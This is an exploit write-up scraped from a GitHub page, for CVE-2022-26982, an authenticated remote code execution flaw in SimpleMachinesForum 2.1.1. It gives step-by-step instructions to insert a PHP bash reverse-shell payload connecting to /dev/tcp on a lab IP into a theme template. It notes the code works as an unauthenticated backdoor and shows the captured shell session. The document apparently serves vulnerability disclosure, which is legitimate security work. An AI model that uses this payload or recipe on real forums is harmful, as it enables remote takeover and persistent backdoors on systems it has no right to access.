Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
0days/SimpleMachinesForum/Exploit.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
28 lines (26 sloc)
1.91 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1 | |
| # Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator. | |
| # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718 | |
| # Date: 7th March 2022 | |
| # CVE ID: CVE-2022-26982 | |
| # Confirmed on release 2.1.1 | |
| # Vendor: https://download.simplemachines.org/ | |
| # Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor! | |
| ############################################### | |
| #Step1- Login with Admin Credentials | |
| #Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php | |
| #Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?> | |
| #Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page | |
| #Step5- Now click on "Themes and Layout" and you will get the reverse shell: | |
| E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell: | |
| listening on [any] 4477 ... | |
| connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276 | |
| bash: cannot set terminal process group (1334): Inappropriate ioctl for device | |
| bash: no job control in this shell | |
| daemon@debian:/opt/bitnami/simplemachinesforum$ whoami | |
| whoami | |
| daemon | |
| daemon@debian:/opt/bitnami/simplemachinesforum$ id | |
| id | |
| uid=1(daemon) gid=1(daemon) groups=1(daemon) | |
| daemon@debian:/opt/bitnami/simplemachinesforum$ |